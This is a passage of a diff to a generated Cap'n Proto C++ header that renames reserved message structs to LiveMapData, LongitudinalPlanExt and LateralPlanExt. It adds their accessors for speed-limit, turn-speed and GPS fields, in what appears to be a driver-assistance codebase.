+ inline void setLastGpsBearingAccuracyDeg(float value); + private: ::capnp::_::StructBuilder _builder; template @@ -237,9 +394,9 @@ private: }; #if !CAPNP_LITE -class CustomReserved0::Pipeline { +class LiveMapData::Pipeline { public: - typedef CustomReserved0 Pipelines; + typedef LiveMapData Pipelines; inline Pipeline(decltype(nullptr)): _typeless(nullptr) {} inline explicit Pipeline(::capnp::AnyPointer::Pipeline&& typeless) @@ -253,9 +410,9 @@ private: }; #endif // !CAPNP_LITE -class CustomReserved1::Reader { +class LongitudinalPlanExt::Reader { public: - typedef CustomReserved1 Reads; + typedef LongitudinalPlanExt Reads; Reader() = default; inline explicit Reader(::capnp::_::StructReader base): _reader(base) {} @@ -270,6 +427,36 @@ public: } #endif // !CAPNP_LITE + inline ::cereal::LongitudinalPlanExt::VisionTurnControllerState getVisionTurnControllerState() const; + + inline float getVisionTurnSpeed() const; + + inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState getSpeedLimitControlState() const; + + inline float getSpeedLimit() const; + + inline float getSpeedLimitOffset() const; + + inline float getDistToSpeedLimit() const; + + inline bool getIsMapSpeedLimit() const; + + inline bool getSpeedLimitPercOffset() const; + + inline float getSpeedLimitValueOffset() const; + + inline float getDistToTurn() const; + + inline float getTurnSpeed() const; + + inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState getTurnSpeedControlState() const; + + inline ::int16_t getTurnSign() const; + + inline bool getDpE2EIsBlended() const; + + inline ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource getLongitudinalPlanExtSource() const; + private: ::capnp::_::StructReader _reader; template @@ -282,9 +469,9 @@ private: friend class ::capnp::Orphanage; }; -class CustomReserved1::Builder { +class LongitudinalPlanExt::Builder { public: - typedef CustomReserved1 Builds; + typedef LongitudinalPlanExt Builds; Builder() = delete; // Deleted to discourage incorrect usage. // You can explicitly initialize to nullptr instead. @@ -298,6 +485,51 @@ public: inline ::kj::StringTree toString() const { return asReader().toString(); } #endif // !CAPNP_LITE + inline ::cereal::LongitudinalPlanExt::VisionTurnControllerState getVisionTurnControllerState(); + inline void setVisionTurnControllerState( ::cereal::LongitudinalPlanExt::VisionTurnControllerState value); + + inline float getVisionTurnSpeed(); + inline void setVisionTurnSpeed(float value); + + inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState getSpeedLimitControlState(); + inline void setSpeedLimitControlState( ::cereal::LongitudinalPlanExt::SpeedLimitControlState value); + + inline float getSpeedLimit(); + inline void setSpeedLimit(float value); + + inline float getSpeedLimitOffset(); + inline void setSpeedLimitOffset(float value); + + inline float getDistToSpeedLimit(); + inline void setDistToSpeedLimit(float value); + + inline bool getIsMapSpeedLimit(); + inline void setIsMapSpeedLimit(bool value); + + inline bool getSpeedLimitPercOffset(); + inline void setSpeedLimitPercOffset(bool value); + + inline float getSpeedLimitValueOffset(); + inline void setSpeedLimitValueOffset(float value); + + inline float getDistToTurn(); + inline void setDistToTurn(float value); + + inline float getTurnSpeed(); + inline void setTurnSpeed(float value); + + inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState getTurnSpeedControlState(); + inline void setTurnSpeedControlState( ::cereal::LongitudinalPlanExt::SpeedLimitControlState value); + + inline ::int16_t getTurnSign(); + inline void setTurnSign( ::int16_t value); + + inline bool getDpE2EIsBlended(); + inline void setDpE2EIsBlended(bool value); + + inline ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource getLongitudinalPlanExtSource(); + inline void setLongitudinalPlanExtSource( ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource value); + private: ::capnp::_::StructBuilder _builder; template @@ -308,9 +540,9 @@ private: }; #if !CAPNP_LITE -class CustomReserved1::Pipeline { +class LongitudinalPlanExt::Pipeline { public: - typedef CustomReserved1 Pipelines; + typedef LongitudinalPlanExt Pipelines; inline Pipeline(decltype(nullptr)): _typeless(nullptr) {} inline explicit Pipeline(::capnp::AnyPointer::Pipeline&& typeless) @@ -324,9 +556,9 @@ private: }; #endif // !CAPNP_LITE -class CustomReserved2::Reader { +class LateralPlanExt::Reader { public: - typedef CustomReserved2 Reads; + typedef LateralPlanExt Reads; Reader() = default; inline explicit Reader(::capnp::_::StructReader base): _reader(base) {} @@ -341,6 +573,12 @@ public: } #endif // !CAPNP_LITE + inline bool hasDPathWLinesX() const; + inline ::capnp::List::Reader getDPathWLinesX() const; + + inline bool hasDPathWLinesY() const; + inline ::capnp::List::Reader getDPathWLinesY() const; + private: ::capnp::_::StructReader _reader; template @@ -353,9 +591,9 @@ private: friend class ::capnp::Orphanage; }; -class CustomReserved2::Builder { +class LateralPlanExt::Builder { public: - typedef CustomReserved2 Builds; + typedef LateralPlanExt Builds; Builder() = delete; // Deleted to discourage incorrect usage. // You can explicitly initialize to nullptr instead. @@ -369,6 +607,22 @@ public: inline ::kj::StringTree toString() const { return asReader().toString(); } #endif // !CAPNP_LITE + inline bool hasDPathWLinesX(); + inline ::capnp::List::Builder getDPathWLinesX(); + inline void setDPathWLinesX( ::capnp::List::Reader value); + inline void setDPathWLinesX(::kj::ArrayPtr value); + inline ::capnp::List::Builder initDPathWLinesX(unsigned int size); + inline void adoptDPathWLinesX(::capnp::Orphan< ::capnp::List>&& value); + inline ::capnp::Orphan< ::capnp::List> disownDPathWLinesX(); + + inline bool hasDPathWLinesY(); + inline ::capnp::List::Builder getDPathWLinesY(); + inline void setDPathWLinesY( ::capnp::List::Reader value); + inline void setDPathWLinesY(::kj::ArrayPtr value); + inline ::capnp::List::Builder initDPathWLinesY(unsigned int size); + inline void adoptDPathWLinesY(::capnp::Orphan< ::capnp::List>&& value); + inline ::capnp::Orphan< ::capnp::List> disownDPathWLinesY(); + private: ::capnp::_::StructBuilder _builder; template @@ -379,9 +633,9 @@ private: }; #if !CAPNP_LITE -class CustomReserved2::Pipeline { +class LateralPlanExt::Pipeline { public: - typedef CustomReserved2 Pipelines; + typedef LateralPlanExt Pipelines; inline Pipeline(decltype(nullptr)): _typeless(nullptr) {} inline explicit Pipeline(::capnp::AnyPointer::Pipeline&& typeless) @@ -894,5 +1148,663 @@ private: // ======================================================================================= +inline bool LiveMapData::Reader::getSpeedLimitValid() const { + return _reader.getDataField( + ::capnp::bounded<0>() * ::capnp::ELEMENTS); +} + +inline bool LiveMapData::Builder::getSpeedLimitValid() { + return _builder.getDataField( + ::capnp::bounded<0>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setSpeedLimitValid(bool value) { + _builder.setDataField( + ::capnp::bounded<0>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getSpeedLimit() const { + return _reader.getDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getSpeedLimit() { + return _builder.getDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setSpeedLimit(float value) { + _builder.setDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); +} + +inline bool LiveMapData::Reader::getSpeedLimitAheadValid() const { + return _reader.getDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} + +inline bool LiveMapData::Builder::getSpeedLimitAheadValid() { + return _builder.getDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setSpeedLimitAheadValid(bool value) { + _builder.setDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getSpeedLimitAhead() const { + return _reader.getDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getSpeedLimitAhead() { + return _builder.getDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setSpeedLimitAhead(float value) { + _builder.setDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getSpeedLimitAheadDistance() const { + return _reader.getDataField( + ::capnp::bounded<3>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getSpeedLimitAheadDistance() { + return _builder.getDataField( + ::capnp::bounded<3>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setSpeedLimitAheadDistance(float value) { + _builder.setDataField( + ::capnp::bounded<3>() * ::capnp::ELEMENTS, value); +} + +inline bool LiveMapData::Reader::getTurnSpeedLimitValid() const { + return _reader.getDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} + +inline bool LiveMapData::Builder::getTurnSpeedLimitValid() { + return _builder.getDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setTurnSpeedLimitValid(bool value) { + _builder.setDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getTurnSpeedLimit() const { + return _reader.getDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getTurnSpeedLimit() { + return _builder.getDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setTurnSpeedLimit(float value) { + _builder.setDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getTurnSpeedLimitEndDistance() const { + return _reader.getDataField( + ::capnp::bounded<5>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getTurnSpeedLimitEndDistance() { + return _builder.getDataField( + ::capnp::bounded<5>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setTurnSpeedLimitEndDistance(float value) { + _builder.setDataField( + ::capnp::bounded<5>() * ::capnp::ELEMENTS, value); +} + +inline ::int16_t LiveMapData::Reader::getTurnSpeedLimitSign() const { + return _reader.getDataField< ::int16_t>( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} + +inline ::int16_t LiveMapData::Builder::getTurnSpeedLimitSign() { + return _builder.getDataField< ::int16_t>( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setTurnSpeedLimitSign( ::int16_t value) { + _builder.setDataField< ::int16_t>( + ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); +} + +inline bool LiveMapData::Reader::hasTurnSpeedLimitsAhead() const { + return !_reader.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); +} +inline bool LiveMapData::Builder::hasTurnSpeedLimitsAhead() { + return !_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); +} +inline ::capnp::List::Reader LiveMapData::Reader::getTurnSpeedLimitsAhead() const { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS)); +} +inline ::capnp::List::Builder LiveMapData::Builder::getTurnSpeedLimitsAhead() { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS)); +} +inline void LiveMapData::Builder::setTurnSpeedLimitsAhead( ::capnp::List::Reader value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), value); +} +inline void LiveMapData::Builder::setTurnSpeedLimitsAhead(::kj::ArrayPtr value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), value); +} +inline ::capnp::List::Builder LiveMapData::Builder::initTurnSpeedLimitsAhead(unsigned int size) { + return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), size); +} +inline void LiveMapData::Builder::adoptTurnSpeedLimitsAhead( + ::capnp::Orphan< ::capnp::List>&& value) { + ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); +} +inline ::capnp::Orphan< ::capnp::List> LiveMapData::Builder::disownTurnSpeedLimitsAhead() { + return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( + ::capnp::bounded<0>() * ::capnp::POINTERS)); +} + +inline bool LiveMapData::Reader::hasTurnSpeedLimitsAheadDistances() const { + return !_reader.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); +} +inline bool LiveMapData::Builder::hasTurnSpeedLimitsAheadDistances() { + return !_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); +} +inline ::capnp::List::Reader LiveMapData::Reader::getTurnSpeedLimitsAheadDistances() const { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS)); +} +inline ::capnp::List::Builder LiveMapData::Builder::getTurnSpeedLimitsAheadDistances() { + return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS)); +} +inline void LiveMapData::Builder::setTurnSpeedLimitsAheadDistances( ::capnp::List::Reader value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), value); +} +inline void LiveMapData::Builder::setTurnSpeedLimitsAheadDistances(::kj::ArrayPtr value) { + ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), value); +} +inline ::capnp::List::Builder LiveMapData::Builder::initTurnSpeedLimitsAheadDistances(unsigned int size) { + return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), size); +} +inline void LiveMapData::Builder::adoptTurnSpeedLimitsAheadDistances( + ::capnp::Orphan< ::capnp::List>&& value) { + ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS), kj::mv(value)); +} +inline ::capnp::Orphan< ::capnp::List> LiveMapData::Builder::disownTurnSpeedLimitsAheadDistances() { + return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( + ::capnp::bounded<1>() * ::capnp::POINTERS)); +} + +inline bool LiveMapData::Reader::hasTurnSpeedLimitsAheadSigns() const { + return !_reader.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS).isNull(); +} +inline bool LiveMapData::Builder::hasTurnSpeedLimitsAheadSigns() { + return !_builder.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS).isNull(); +} +inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader LiveMapData::Reader::getTurnSpeedLimitsAheadSigns() const { + return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::get(_reader.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS)); +} +inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder LiveMapData::Builder::getTurnSpeedLimitsAheadSigns() { + return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::get(_builder.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS)); +} +inline void LiveMapData::Builder::setTurnSpeedLimitsAheadSigns( ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader value) { + ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::set(_builder.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS), value); +} +inline void LiveMapData::Builder::setTurnSpeedLimitsAheadSigns(::kj::ArrayPtr value) { + ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::set(_builder.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS), value); +} +inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder LiveMapData::Builder::initTurnSpeedLimitsAheadSigns(unsigned int size) { + return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::init(_builder.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS), size); +} +inline void LiveMapData::Builder::adoptTurnSpeedLimitsAheadSigns( + ::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>&& value) { + ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::adopt(_builder.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS), kj::mv(value)); +} +inline ::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>> LiveMapData::Builder::disownTurnSpeedLimitsAheadSigns() { + return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::disown(_builder.getPointerField( + ::capnp::bounded<2>() * ::capnp::POINTERS)); +} + +inline ::int64_t LiveMapData::Reader::getLastGpsTimestamp() const { + return _reader.getDataField< ::int64_t>( + ::capnp::bounded<3>() * ::capnp::ELEMENTS); +} + +inline ::int64_t LiveMapData::Builder::getLastGpsTimestamp() { + return _builder.getDataField< ::int64_t>( + ::capnp::bounded<3>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setLastGpsTimestamp( ::int64_t value) { + _builder.setDataField< ::int64_t>( + ::capnp::bounded<3>() * ::capnp::ELEMENTS, value); +} + +inline bool LiveMapData::Reader::hasCurrentRoadName() const { + return !_reader.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS).isNull(); +} +inline bool LiveMapData::Builder::hasCurrentRoadName() { + return !_builder.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS).isNull(); +} +inline ::capnp::Text::Reader LiveMapData::Reader::getCurrentRoadName() const { + return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_reader.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS)); +} +inline ::capnp::Text::Builder LiveMapData::Builder::getCurrentRoadName() { + return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_builder.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS)); +} +inline void LiveMapData::Builder::setCurrentRoadName( ::capnp::Text::Reader value) { + ::capnp::_::PointerHelpers< ::capnp::Text>::set(_builder.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS), value); +} +inline ::capnp::Text::Builder LiveMapData::Builder::initCurrentRoadName(unsigned int size) { + return ::capnp::_::PointerHelpers< ::capnp::Text>::init(_builder.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS), size); +} +inline void LiveMapData::Builder::adoptCurrentRoadName( + ::capnp::Orphan< ::capnp::Text>&& value) { + ::capnp::_::PointerHelpers< ::capnp::Text>::adopt(_builder.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS), kj::mv(value)); +} +inline ::capnp::Orphan< ::capnp::Text> LiveMapData::Builder::disownCurrentRoadName() { + return ::capnp::_::PointerHelpers< ::capnp::Text>::disown(_builder.getPointerField( + ::capnp::bounded<3>() * ::capnp::POINTERS)); +} + +inline double LiveMapData::Reader::getLastGpsLatitude() const { + return _reader.getDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS); +} + +inline double LiveMapData::Builder::getLastGpsLatitude() { + return _builder.getDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setLastGpsLatitude(double value) { + _builder.setDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, value); +} + +inline double LiveMapData::Reader::getLastGpsLongitude() const { + return _reader.getDataField( + ::capnp::bounded<5>() * ::capnp::ELEMENTS); +} + +inline double LiveMapData::Builder::getLastGpsLongitude() { + return _builder.getDataField( + ::capnp::bounded<5>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setLastGpsLongitude(double value) { + _builder.setDataField( + ::capnp::bounded<5>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getLastGpsSpeed() const { + return _reader.getDataField( + ::capnp::bounded<12>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getLastGpsSpeed() { + return _builder.getDataField( + ::capnp::bounded<12>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setLastGpsSpeed(float value) { + _builder.setDataField( + ::capnp::bounded<12>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getLastGpsBearingDeg() const { + return _reader.getDataField( + ::capnp::bounded<13>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getLastGpsBearingDeg() { + return _builder.getDataField( + ::capnp::bounded<13>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setLastGpsBearingDeg(float value) { + _builder.setDataField( + ::capnp::bounded<13>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getLastGpsAccuracy() const { + return _reader.getDataField( + ::capnp::bounded<14>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getLastGpsAccuracy() { + return _builder.getDataField( + ::capnp::bounded<14>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setLastGpsAccuracy(float value) { + _builder.setDataField( + ::capnp::bounded<14>() * ::capnp::ELEMENTS, value); +} + +inline float LiveMapData::Reader::getLastGpsBearingAccuracyDeg() const { + return _reader.getDataField( + ::capnp::bounded<15>() * ::capnp::ELEMENTS); +} + +inline float LiveMapData::Builder::getLastGpsBearingAccuracyDeg() { + return _builder.getDataField( + ::capnp::bounded<15>() * ::capnp::ELEMENTS); +} +inline void LiveMapData::Builder::setLastGpsBearingAccuracyDeg(float value) { + _builder.setDataField( + ::capnp::bounded<15>() * ::capnp::ELEMENTS, value); +} + +inline ::cereal::LongitudinalPlanExt::VisionTurnControllerState LongitudinalPlanExt::Reader::getVisionTurnControllerState() const { + return _reader.getDataField< ::cereal::LongitudinalPlanExt::VisionTurnControllerState>( + ::capnp::bounded<0>() * ::capnp::ELEMENTS); +} + +inline ::cereal::LongitudinalPlanExt::VisionTurnControllerState LongitudinalPlanExt::Builder::getVisionTurnControllerState() { + return _builder.getDataField< ::cereal::LongitudinalPlanExt::VisionTurnControllerState>( + ::capnp::bounded<0>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setVisionTurnControllerState( ::cereal::LongitudinalPlanExt::VisionTurnControllerState value) { + _builder.setDataField< ::cereal::LongitudinalPlanExt::VisionTurnControllerState>( + ::capnp::bounded<0>() * ::capnp::ELEMENTS, value); +} + +inline float LongitudinalPlanExt::Reader::getVisionTurnSpeed() const { + return _reader.getDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} + +inline float LongitudinalPlanExt::Builder::getVisionTurnSpeed() { + return _builder.getDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setVisionTurnSpeed(float value) { + _builder.setDataField( + ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); +} + +inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState LongitudinalPlanExt::Reader::getSpeedLimitControlState() const { + return _reader.getDataField< ::cereal::LongitudinalPlanExt::SpeedLimitControlState>( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} + +inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState LongitudinalPlanExt::Builder::getSpeedLimitControlState() { + return _builder.getDataField< ::cereal::LongitudinalPlanExt::SpeedLimitControlState>( + ::capnp::bounded<1>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setSpeedLimitControlState( ::cereal::LongitudinalPlanExt::SpeedLimitControlState value) { + _builder.setDataField< ::cereal::LongitudinalPlanExt::SpeedLimitControlState>( + ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); +} + +inline float LongitudinalPlanExt::Reader::getSpeedLimit() const { + return _reader.getDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} + +inline float LongitudinalPlanExt::Builder::getSpeedLimit() { + return _builder.getDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setSpeedLimit(float value) { + _builder.setDataField( + ::capnp::bounded<2>() * ::capnp::ELEMENTS, value); +} + +inline float LongitudinalPlanExt::Reader::getSpeedLimitOffset() const { + return _reader.getDataField( + ::capnp::bounded<3>() * ::capnp::ELEMENTS); +} + +inline float LongitudinalPlanExt::Builder::getSpeedLimitOffset() { + return _builder.getDataField( + ::capnp::bounded<3>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setSpeedLimitOffset(float value) { + _builder.setDataField( + ::capnp::bounded<3>() * ::capnp::ELEMENTS, value); +} + +inline float LongitudinalPlanExt::Reader::getDistToSpeedLimit() const { + return _reader.getDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS); +} + +inline float LongitudinalPlanExt::Builder::getDistToSpeedLimit() { + return _builder.getDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setDistToSpeedLimit(float value) { + _builder.setDataField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, value); +} + +inline bool LongitudinalPlanExt::Reader::getIsMapSpeedLimit() const { + return _reader.getDataField( + ::capnp::bounded<160>() * ::capnp::ELEMENTS); +} + +inline bool LongitudinalPlanExt::Builder::getIsMapSpeedLimit() { + return _builder.getDataField( + ::capnp::bounded<160>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setIsMapSpeedLimit(bool value) { + _builder.setDataField( + ::capnp::bounded<160>() * ::capnp::ELEMENTS, value); +} + +inline bool LongitudinalPlanExt::Reader::getSpeedLimitPercOffset() const { + return _reader.getDataField( + ::capnp::bounded<161>() * ::capnp::ELEMENTS); +} + +inline bool LongitudinalPlanExt::Builder::getSpeedLimitPercOffset() { + return _builder.getDataField( + ::capnp::bounded<161>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setSpeedLimitPercOffset(bool value) { + _builder.setDataField( + ::capnp::bounded<161>() * ::capnp::ELEMENTS, value); +} + +inline float LongitudinalPlanExt::Reader::getSpeedLimitValueOffset() const { + return _reader.getDataField( + ::capnp::bounded<6>() * ::capnp::ELEMENTS); +} + +inline float LongitudinalPlanExt::Builder::getSpeedLimitValueOffset() { + return _builder.getDataField( + ::capnp::bounded<6>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setSpeedLimitValueOffset(float value) { + _builder.setDataField( + ::capnp::bounded<6>() * ::capnp::ELEMENTS, value); +} + +inline float LongitudinalPlanExt::Reader::getDistToTurn() const { + return _reader.getDataField( + ::capnp::bounded<7>() * ::capnp::ELEMENTS); +} + +inline float LongitudinalPlanExt::Builder::getDistToTurn() { + return _builder.getDataField( + ::capnp::bounded<7>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setDistToTurn(float value) { + _builder.setDataField( + ::capnp::bounded<7>() * ::capnp::ELEMENTS, value); +} + +inline float LongitudinalPlanExt::Reader::getTurnSpeed() const { + return _reader.getDataField( + ::capnp::bounded<8>() * ::capnp::ELEMENTS); +} + +inline float LongitudinalPlanExt::Builder::getTurnSpeed() { + return _builder.getDataField( + ::capnp::bounded<8>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setTurnSpeed(float value) { + _builder.setDataField( + ::capnp::bounded<8>() * ::capnp::ELEMENTS, value); +} + +inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState LongitudinalPlanExt::Reader::getTurnSpeedControlState() const { + return _reader.getDataField< ::cereal::LongitudinalPlanExt::SpeedLimitControlState>( + ::capnp::bounded<11>() * ::capnp::ELEMENTS); +} + +inline ::cereal::LongitudinalPlanExt::SpeedLimitControlState LongitudinalPlanExt::Builder::getTurnSpeedControlState() { + return _builder.getDataField< ::cereal::LongitudinalPlanExt::SpeedLimitControlState>( + ::capnp::bounded<11>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setTurnSpeedControlState( ::cereal::LongitudinalPlanExt::SpeedLimitControlState value) { + _builder.setDataField< ::cereal::LongitudinalPlanExt::SpeedLimitControlState>( + ::capnp::bounded<11>() * ::capnp::ELEMENTS, value); +} + +inline ::int16_t LongitudinalPlanExt::Reader::getTurnSign() const { + return _reader.getDataField< ::int16_t>( + ::capnp::bounded<18>() * ::capnp::ELEMENTS); +} + +inline ::int16_t LongitudinalPlanExt::Builder::getTurnSign() { + return _builder.getDataField< ::int16_t>( + ::capnp::bounded<18>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setTurnSign( ::int16_t value) { + _builder.setDataField< ::int16_t>( + ::capnp::bounded<18>() * ::capnp::ELEMENTS, value); +} + +inline bool LongitudinalPlanExt::Reader::getDpE2EIsBlended() const { + return _reader.getDataField( + ::capnp::bounded<162>() * ::capnp::ELEMENTS); +} + +inline bool LongitudinalPlanExt::Builder::getDpE2EIsBlended() { + return _builder.getDataField( + ::capnp::bounded<162>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setDpE2EIsBlended(bool value) { + _builder.setDataField( + ::capnp::bounded<162>() * ::capnp::ELEMENTS, value); +} + +inline ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource LongitudinalPlanExt::Reader::getLongitudinalPlanExtSource() const { + return _reader.getDataField< ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource>( + ::capnp::bounded<19>() * ::capnp::ELEMENTS); +} + +inline ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource LongitudinalPlanExt::Builder::getLongitudinalPlanExtSource() { + return _builder.getDataField< ::cereal::LongitudinalPlanExt::LongitudinalPlanExtSource>( + ::capnp::bounded<19>() * ::capnp::ELEMENTS); +} +inline void LongitudinalPlanExt::Builder::setLongitudinalPlanExtSource( 